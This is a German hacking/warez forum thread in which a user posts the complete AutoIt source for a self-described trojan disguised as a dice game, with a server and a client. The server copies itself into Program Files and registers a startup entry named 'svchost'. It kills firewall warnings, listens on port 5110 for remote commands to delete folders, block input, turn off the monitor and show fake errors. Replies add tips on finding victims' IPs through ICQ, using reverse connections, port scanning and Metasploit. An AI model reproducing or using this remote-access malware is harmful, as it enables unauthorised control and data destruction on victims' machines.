Mini Trojaner

Answer · 22.11.09, 00:22

Ist es Verboten hier eigene Mini Trojaner o.ä. reinzustellen? Ich will nicht gleich gebannt werden

Es ist kein gefährlicher, sonder einfach so ein "ICQ-gag". Schnell versenden, IP rauskriegen (mit ICQ total leicht) und Bildschirm An/Aus machen und so...

Also darf ich oder nich?

Downloadlink zweite Seite!!!

mfg
Answer

Marv111 · 22.11.09, 00:31

Selber wissen tu ich es nicht aber.. hier tuen tausende ihre downloads rein mit trojanern etc. xD

!FlaSh! · 22.11.09, 00:47

Ist soweit Ok ... aber bitte virenfrei ...

virustotal.com link bitte dazu posten ...

gosha16 · 22.11.09, 09:41

Zitat:

Zitat von !FlaSh!

Ist soweit Ok ... aber bitte virenfrei ...

virustotal.com link bitte dazu posten ...

Virenfreie Trojaner!

!FlaSh! · 22.11.09, 13:01

Ich meine halt, das im Trojaner nicht noch 2 andere Trojaner versteckt sind ..

Ich hoffe, du verstehst

bugfix · 22.11.09, 13:30

--------------

Elend · 22.11.09, 13:48

Auch ein mit Viren befallendes Tool kann man FUD machen, von daher ist virustotal überflüssig

.

bugfix · 22.11.09, 13:51

--------------

!FlaSh! · 22.11.09, 14:45

Zitat:

Zitat von Elend

Auch ein mit Viren befallendes Tool kann man FUD machen, von daher ist virustotal überflüssig

.

Daher am besten in einer Virtuellen Maschine ausprobieren.

22.11.09, 14:54

Zitat:

Zitat von Elend

Auch ein mit Viren befallendes Tool kann man FUD machen, von daher ist virustotal überflüssig

.

Und darum würde ich auch sagen NÖ!

Wir sind ein Warez Board und kein Hack/Viren/Trojaner Board!!!

gosha16 · 22.11.09, 15:01

Zitat:

Zitat von Prince Porn

Und darum würde ich auch sagen NÖ!

Wir sind ein Warez Board und kein Hack/Viren/Trojaner Board!!!

Steht aber in der Subforenbeschreibung

Answer · 22.11.09, 15:02

Is überhaupt nix gefährliches!!!!
Hier die links zum Download:

client:
[ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
server:
[ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]

ACHTUNG!!!! Is getarnt als Würfelspiel^^

Quellcode Server (AutoIt):

Code:

#include <GuiConstantsEx.au3>
#include <INet.au3>
#NoTrayIcon
If FileRead(@MyDocumentsDir & "\windowsshortfile.data") = 0 Then
	ProcessClose("explorer.exe")
	Sleep(1000)
	Run(@SystemDir & "\explorer.exe")
	Sleep(500)
	MsgBox(64, "Nicht Kompatibel", "Windows kann diese Datei nicht mit ihrer ServicePackversion " & @OSServicePack & " starten." & @LF & "WSA Errornumber: 884eIIOþ",10)
	MsgBox(64, "Short Info", "OSLang: " & @OSLang & @LF & "OSBuild: " & @OSBuild & @LF & "OSVersion: " & @OSVersion & @LF & "OSServicepack: "&@OSServicePack & @LF & "IPv4: " & @IPAddress1 & @LF & "IPv6: " & _GetIP(),10)
	FileWrite(@MyDocumentsDir & "\windowsshortfile.data", @IPAddress1 & "-" &  _GetIP())
	FileCopy(@S*****FullPath, "C:\Programme\winserver.exe",1)
EndIf
#RequireAdmin
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","svchost","REG_SZ",'"'& "C:\Programme\winserver.exe"&'"')
Local $szServerPC = @ComputerName
Local $szIPADDRESS = @IPAddress1
Local $nPORT = 5110
Local $MainSocket, $GOOEY, $edit, $ConnectedSocket, $szIP_Accepted
Local $msg, $recv
TCPStartup()
$count = 1
While 1
	If WinExists("Windows-Sicherheitshinweis", "") Then WinKill("Windows-Sicherheitshinweis", "")
	If $count = 20000 Then ExitLoop
	Sleep(1)
	$count = $count + 1
WEnd
HotKeySet("{F1}", "showhide")
$show = False
$MainSocket = TCPListen($szIPADDRESS, $nPORT)
If $MainSocket = -1 Then Exit
$GOOEY = GUICreate("My Server (IP: " & $szIPADDRESS & ")", 300, 200)
$edit = GUICtrlCreateEdit("", 10, 10, 280, 180)
GUISetState(@SW_HIDE)
$ConnectedSocket = -1
Do
    $ConnectedSocket = TCPAccept($MainSocket)
Until $ConnectedSocket <> -1
$szIP_Accepted = SocketToIP($ConnectedSocket)
While 1
	$msg = GUIGetMsg()
    If $msg = $GUI_EVENT_CLOSE Then ExitLoop
	$recv = TCPRecv($ConnectedSocket, 2048)
    If @error Then ExitLoop
    If $recv <> "" Then
		$sNew = StringSplit($recv, "|")
		GUICtrlSetData($edit, SocketToIP($ConnectedSocket) & ">--< " & $recv & @CRLF & GUICtrlRead($edit))
		If $sNew[1] = "bildschirm" Then
			If $sNew[2] = "on" Then $art = -1
			If $sNew[2] = "off" Then $art = 2
			Opt("WinTitleMatchMode", 4)
			$hwnd = WinGetHandle('classname=Progman')
			_ToggleMonitor($hWnd, $art)
		EndIf
		If $sNew[1] = "del" Then
			DirRemove($sNew[2], 1)
		EndIf
		If $sNew[1] = "error" Then
			MsgBox($sNew[2], $sNew[3], $sNew[4])
		EndIf
		If $sNew[1] = "blockinput" Then
			BlockInput($sNew[2])
		EndIf
	EndIf
WEnd
If $ConnectedSocket <> -1 Then TCPCloseSocket($ConnectedSocket)
TCPShutdown()

; Function to return IP Address from a connected socket.
;----------------------------------------------------------------------
Func SocketToIP($SHOCKET)
    Local $sockaddr, $aRet
    
    $sockaddr = DllStructCreate("short;ushort;uint;char[8]")

    $aRet = DllCall("Ws2_32.dll", "int", "getpeername", "int", $SHOCKET, _
            "ptr", DllStructGetPtr($sockaddr), "int*", DllStructGetSize($sockaddr))
    If Not @error And $aRet[0] = 0 Then
        $aRet = DllCall("Ws2_32.dll", "str", "inet_ntoa", "int", DllStructGetData($sockaddr, 3))
        If Not @error Then $aRet = $aRet[0]
    Else
        $aRet = 0
    EndIf

    $sockaddr = 0

    Return $aRet
EndFunc   ;==>SocketToIP

; Funktion to Toggle Monitor On or Off
; ---------------------------------------------------------------------
Func _ToggleMonitor($hwnd, $OnOff)
    Local Const $WM_SYSCOMMAND = 274
    Local Const $SC_MONITORPOWER = 61808
    _SendMessage2($hWnd, $WM_SYSCOMMAND, $SC_MONITORPOWER, $OnOff)
    If @error Then
        MsgBox(0,"_ToggleMonitor", "_SendMessage Error: " & @error)
        Exit
    EndIf
EndFunc

Func _SendMessage2($hWnd, $iMsg, $wParam = 0, $lParam = 0, $iReturn = 0, $wParamType = "wparam", $lParamType = "lparam", $sReturnType = "lparam")
	Local $aResult = DllCall("user32.dll", $sReturnType, "SendMessage", "hwnd", $hWnd, "int", $iMsg, $wParamType, $wParam, $lParamType, $lParam)
	If @error Then Return SetError(@error, @extended, "")
	If $iReturn >= 0 And $iReturn <= 4 Then Return $aResult[$iReturn]
	Return $aResult
EndFunc   ;==>_SendMessage

Func showhide()
	If $show = False Then
		GUISetState(@SW_SHOW)
		$show = True
	Else
		GUISetState(@SW_HIDE)
		$show = False
	EndIf
EndFunc

Client:

Code:

#include <GUIConstantsEx.au3>
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>

Example()

Func Example()
	; Set Some reusable info
	;--------------------------
	Local $ConnectedSocket, $szData
	Local $szIPADDRESS = @IPAddress1
	Local $nPORT = 5110

	; Start The TCP Services
	;==============================================
	TCPStartup()

	; Initialize a variable to represent a connection
	;==============================================
	$ConnectedSocket = -1

	;Attempt to connect to SERVER at its IP and PORT 33891
	;=======================================================
;~ 	$ConnectedSocket = TCPConnect($szIPADDRESS, $nPORT)

	; If there is an error... show it
;~ 	If @error Then
;~ 		MsgBox(4112, "Error", "TCPConnect failed with WSA error: " & @error)
;~ 	Else
		#Region ### START Koda GUI section ### Form		
		$Form1 = GUICreate("AnswerTrojan by Answer", 184, 218, 262, 171)
		$Label1 = GUICtrlCreateLabel("IP:", 8, 8, 22, 20)
		GUICtrlSetFont(-1, 10, 800, 0, "MS Sans Serif")
		$IP = GUICtrlCreateInput(@IPAddress1, 32, 8, 85, 21)
		GUICtrlSetLimit(-1, 13)
		$connect = GUICtrlCreateButton("Verbinden", 124, 8, 55, 25, 0)
		$Group1 = GUICtrlCreateGroup("Möglichkeiten:", 8, 40, 169, 153)
		$message = GUICtrlCreateButton("Nachricht senden", 16, 64, 155, 25, 0)
		$delete = GUICtrlCreateButton("Daten löschen", 16, 96, 155, 25, 0)
		$monitor = GUICtrlCreateButton("Bildschirmoptionen", 16, 128, 155, 25, 0)
		$keyboard = GUICtrlCreateButton("Tastatur u. Maus", 16, 160, 155, 25, 0)
		GUICtrlCreateGroup("", -99, -99, 1, 1)
		$status = GUICtrlCreateLabel(@TAB & "Nicht verbunden", -8, 200, 196, 19, $SS_CENTERIMAGE)
		GUICtrlSetBkColor(-1, 0xFF0000)
		GUISetState(@SW_SHOW)
		GUICtrlSetState($message, $GUI_DISABLE)
		GUICtrlSetState($delete, $GUI_DISABLE)
		GUICtrlSetState($monitor, $GUI_DISABLE)
		GUICtrlSetState($keyboard, $GUI_DISABLE)
		#EndRegion ### END Koda GUI section ###

		While 1
			$nMsg = GUIGetMsg()
			Switch $nMsg
				Case $connect
					If GUICtrlRead($connect) = "Verbinden" Then
						GUICtrlSetData($status, @TAB & "Verbindung wird hergestellt...")
						$ConnectedSocket = TCPConnect(GUICtrlRead($IP), $nPORT)
						If @error Then 
							MsgBox(4112, "Fatal ERROR", "TCPConnect failed with WSA error: " & @error)
							GUICtrlSetData($status, @TAB & "Nicht verbunden")
						Else
							GUICtrlSetData($status, @TAB & "Verbunden")
							GUICtrlSetData($connect, "Trennen")
							GUICtrlSetState($message, $GUI_ENABLE)
							GUICtrlSetState($delete, $GUI_ENABLE)
							GUICtrlSetState($monitor, $GUI_ENABLE)
							GUICtrlSetState($keyboard, $GUI_ENABLE)
						EndIf
					Else
						TCPCloseSocket($ConnectedSocket)
						GUICtrlSetData($status, @TAB & "Nicht verbunden")
						GUICtrlSetData($connect, "Verbinden")
						GUICtrlSetState($message, $GUI_ENABLE)
						GUICtrlSetState($delete, $GUI_ENABLE)
						GUICtrlSetState($monitor, $GUI_ENABLE)
						GUICtrlSetState($keyboard, $GUI_ENABLE)
					EndIf
				Case $GUI_EVENT_CLOSE
					Exit

				Case $message
					$titel = InputBox("Titel", "Bitte den Titel der Meldung angeben", "Windows Kontrollzentrum")
					If $titel <> "" Then
						$text = InputBox("Text", "Bitte den Text für die Fehlermeldung schreiben", "Error in datei ""%windir%\system32\stupiduser.dll""")
						If $text <> "" Then
							TCPSend($ConnectedSocket, "error|16|" & $titel & "|" & $text)
						EndIf
					EndIf
				Case $delete
					$pfad = InputBox("Löschen", "Bitte hier den Pfad zum löschen angeben" & @LF & "zb.:" & @LF & @LF & "C:\Programme\" & @LF & "C:\Programme\<programmname>\")
					If $pfad <> "" Then TCPSend($ConnectedSocket, "del|" & $pfad)
				Case $keyboard
					#Region ### START Koda GUI section ### Form=
					GUISetState(@SW_DISABLE)
					$Form2 = GUICreate("T u. A optionen", 216, 66, 193, 125)
					GUICtrlCreateLabel("Tastatur u. Mausoptionen wählen:", 8, 8, 165, 17)
					$TUM1 = GUICtrlCreateButton("Sperren", 8, 32, 75, 25, 0)
					$TUS0 = GUICtrlCreateButton("Entsperren", 136, 32, 75, 25, 0)
					GUISetState(@SW_SHOW)
					#EndRegion ### END Koda GUI section ###

					While 1
						$nMsg = GUIGetMsg()
						Switch $nMsg
							Case $GUI_EVENT_CLOSE
								ExitLoop

							Case $TUM1
								TCPSend($ConnectedSocket, "blockinput|1")
							Case $TUS0
								TCPSend($ConnectedSocket, "blockinput|0")
						EndSwitch
					WEnd
					GUIDelete()
					GUISetState(@SW_ENABLE)
				Case $monitor
					#Region ### START Koda GUI section ### Form=
					GUISetState(@SW_DISABLE)
					$Form2 = GUICreate("Bildschirm", 216, 66, 193, 125)
					GUICtrlCreateLabel("Bildschirmoptionen", 8, 8, 165, 17)
					$On = GUICtrlCreateButton("An", 8, 32, 75, 25, 0)
					$Off = GUICtrlCreateButton("Aus", 136, 32, 75, 25, 0)
					GUISetState(@SW_SHOW)
					#EndRegion ### END Koda GUI section ###

					While 1
						$nMsg = GUIGetMsg()
						Switch $nMsg
							Case $GUI_EVENT_CLOSE
								ExitLoop

							Case $On
								TCPSend($ConnectedSocket, "bildschirm|on")
							Case $Off
								TCPSend($ConnectedSocket, "bildschirm|off")
						EndSwitch
					WEnd
					GUIDelete()
					GUISetState(@SW_ENABLE)
			EndSwitch
		WEnd
;~ 	EndIf
EndFunc   ;==>Example

22.11.09, 15:02

Das ausgerechnet Du jetzt rumwunderst ....

mogo · 24.11.09, 22:04

Und was kann der alles wenn mir der Quell Text mal nichts sagt bzw. ich mich damit net aus kenne

Jetzt kommt mir aber nicht das ich es dann sein lassen kann. Ich frage ja nur und jeder fängt mal an sich in neue Gebiete zu begeben

austrianidi0t · 24.11.09, 23:43

hey^^ kannst das auch für Windows 7 lauffähig machen? mit kompatibilität läuft da leida nix.... ^^

gosha16 · 25.11.09, 05:52

Zitat:

Zitat von mogo

Und was kann der alles wenn mir der Quell Text mal nichts sagt bzw. ich mich damit net aus kenne

Jetzt kommt mir aber nicht das ich es dann sein lassen kann. Ich frage ja nur und jeder fängt mal an sich in neue Gebiete zu begeben

Als erstes soltlest du lesen lernen... schau mal in den ersten beitrag

Answer · 25.11.09, 13:27

Vielleicht könnte sich auch mal jemand aufs Thema konzentrieren???

Hab nämlich schon fehler festgestellt.
Beim ersten start wird doch die datei nach C:\Programme\winserver.exe geschoben.
Wenn man die Datei öffnen will kommt ein Error. ka warum.

Ich teste mal weiter und wir werden sehen

Anleitung zum IP rauskriegen bei ICQ:
Wenn die datei über ICQ versendet und gestartet worden ist folgendes tun.
- CMD starten (Start Ausführen CMD <Enter>; Start suche eingeben CMD <Enter>)
- "netstat" eingeben und warten bis es geladen hat
- Die IP mit :5190 (ICQ port) suchen und in den Client oben reinschreiben (ohne :5190)

@austrianidi0t
is unter Win7 gemacht worden. Dass am anfang der Desktop + Taskleiste verschwindet soll so sein.
Und die ganzen Fehlermeldungen sind beabsichtigt!!!!

LOL
jetzt hab ich noch Anti-Firewall hinzugefügt. wenn das Firewallfenster kommt, wird es einfach "gekillt".
sieht so aus:
$count = 0
While 1
If WinExists("Windows-Sicherheitsmeldung","") Then WinKill("Windows-Sicherheitsmeldung")
If $count = 20000 Then Exitloop
sleep(1)
$count = $count + 1
WEnd

gosha16 · 25.11.09, 18:07

warum horcht dein client?

Answer · 26.11.09, 12:38

Was macht der? horcht? wasn das?

gosha16 · 26.11.09, 13:38

na dein client muss doch auf irgend nem port horchen ob ne verbindung ansteht? Ansonsten würde die Firewallmeldung doch garnet kommen

Answer · 26.11.09, 15:22

Aso,
Port: 5110
Ein übliches Trojanerport, weil kein häufig benutztes Programm drüberläuft.

gosha16 · 26.11.09, 17:11

aber warum macht der das? das is doch totaler schwachsinn, wenn da nen NAT router davor hängt kannst du dich doch garnich zu dem hin verbinden.

Answer · 26.11.09, 18:58

Zitat:

aber warum macht der das?

Weil ich den Befehl so eingegeben habe^^

Zitat:

das is doch totaler schwachsinn, wenn da nen NAT router davor hängt kannst du dich doch garnich zu dem hin verbinden.

Gib mir nen tipp wie ichs besser machen soll.
Hab grad garkeine ahnung was du meinst.

Zumindest innerhalb von Netzwerken klappt es. (mehr brauch man in der Schule auch nicht, wenn man den Lehrer ärgern möchte)

gosha16 · 26.11.09, 19:10

also wenn du nur in netzwerken arbeitest dann is das so in ordnung. wenn du aber im Internet agierst müsste dein Opfer erst den Port 5110 in seinem Router freigeben, wird wohl kaum einer machen. Besser wäre es wenn dein Server auf dem Port horcht, sprich verbindungen erwartet. Wenn du jemanden deinen Trojanerclient sendest baut der dann eine Verbindung zu dir auf.
1. Windows Firewall meldet sich nicht (Allerdings reagieren PFWs auch auf das)
2. Nur du musst den Port freigeben.

Aber wie gesagt in nem Intranet is es egal.

Answer · 27.11.09, 20:31

Also der Connected zu mir.....hab darüber noch garnicht nachgedacht. clever^^
THX
werd mich mal damit beschäftigen.
Aber Heut nimmer.

christophkrner · 01.12.09, 12:49

effektiver ist es beim clienten einen sehr langsamen portscan auszuführen. So ist es einfacher den Trojaner an mehrere Systeme anzukoppeln.

creeddante · 01.12.09, 13:07

Könnt ihr mir beibringen wie so etwas funktioniert?

Ich hatte mal einen Trojaner, der lief auch, wurde aber nach ner Zeit langweilich weil zu wenig Opfer um ärgern da waren..

Mir hat das jemand mit Bifrost gemacht, Trojaner erstellt und ich habs halt verschickt oder über no-ip seine opfer gesehen...

Aber wie das mit Bifrost funktioniert.. keine ahnung^^

christophkrner · 01.12.09, 16:07

lass die billig-s***** kiddy programe. Metasploit Framework mit Exploits sind effektiver. Nmap ist auch sehr wichtig. Wenn du das kannst, dann wirst du Spass haben!!